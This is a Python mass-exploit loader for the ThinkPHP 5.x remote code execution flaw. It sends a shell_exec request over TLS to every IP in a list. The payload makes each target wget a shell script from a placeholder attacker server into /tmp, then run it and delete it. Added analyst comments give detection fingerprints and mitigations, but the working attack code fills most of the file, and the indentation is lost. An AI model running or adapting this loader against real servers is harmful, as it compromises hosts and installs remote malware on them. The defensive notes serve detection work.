#!/usr/bin/python
# ThinkPHP 5x - Remote Code Execution ( SSL VERSION )
# Scan on port 443 for more results the original version of that exploit / loader is fucking bullshit
# Modified by vbrxmr the your daddy
import threading
import socket
import ssl
import time
import sys
# Opens the file named by the first command-line argument in 'a+' mode.
# The handle is iterated line by line at the bottom of the script (one
# address per line is what the Thread class below expects) and is never
# closed explicitly.
info = open(str(sys.argv[1]),'a+')
# Thread subclass that sends one hard-coded HTTPS request to one address.
# NOTE(review): indentation was lost in this listing; the nesting described
# in these comments is inferred from statement order. Confirm against an
# intact copy before relying on it.
#
# Analyst notes (detection / mitigation), all taken from the literals below:
#   * Request target: /public/index.php with s=/index/\think\app/invokefunction,
#     function=call_user_func_array and vars[0]=shell_exec. The page title
#     describes this as the ThinkPHP 5.x remote code execution pattern.
#   * Request fingerprints: User-Agent "chokemedaddy/1.0", the literal header
#     "Accept: /", unencoded spaces and semicolons in the query string, a
#     stray single quote before " HTTP/1.1", and no Host header.
#   * Command carried in vars[1][]: change to /tmp, wget a shell script from
#     /bins/vbrxmr.sh on the host written as YOUR.SERVER.IP (presumably a
#     placeholder), chmod 777 it, run it with sh, then delete it.
#   * Host-side signals to hunt for: a PHP/web-server worker spawning
#     sh or wget, and short-lived executable files appearing in /tmp.
#   * Mitigations: run a vendor-patched ThinkPHP release, block the
#     invokefunction route at the WAF / reverse proxy, list shell_exec in
#     PHP's disable_functions, and restrict outbound HTTP from web servers.
class thinkphp(threading.Thread):
# Stores the target address as a string with trailing newlines removed
# (addresses arrive as raw lines from the input file).
def __init__(self, ip):
threading.Thread.__init__(self)
self.ip = str(ip).rstrip('\n')
# Thread body: build the request, open a TLS connection to port 443,
# send the request once and close. No response is ever read, so the
# script cannot tell whether a target was vulnerable; server access logs
# will show the request either way.
def run(self):
try:
request = "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd /tmp; wget http://YOUR.SERVER.IP/bins/vbrxmr.sh; chmod 777 vbrxmr.sh; sh vbrxmr.sh; rm -rf vbrxmr.sh' HTTP/1.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: /\r\nUser-Agent: chokemedaddy/1.0\r\n\r\n" # payload stage
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# wrap_socket is called with no arguments: no certificate validation is
# requested and no server name is supplied, so the TLS handshake should
# carry no SNI. That makes SNI-less connections to many addresses a
# usable network-side indicator. TODO confirm on the wire.
ssl_sock = ssl.wrap_socket(sock)
ssl_sock.connect((self.ip, 443)) # https port for the socket connection do not change this moron
ssl_sock.sendall(request.encode('utf-8')) # some encoding
ssl_sock.close()
# Any failure (connect, TLS handshake, send) is printed and the thread
# ends; nothing is retried or recorded.
except Exception as e:
print(e)
return
# Driver loop: for every line of the input file, wait 10 ms and start one
# thinkphp thread for that line. Threads are never joined and there is no
# cap on how many run at once; the 0.01 s sleep is the only pacing.
# Network-side this shows up as a burst of outbound TCP/443 connections
# from one source to many distinct addresses, each carrying a single
# request. The bare except silently discards every error raised while
# creating or starting a thread.
for ip in info:
try:
time.sleep(0.01)
thinkphp(ip).start()
except:
pass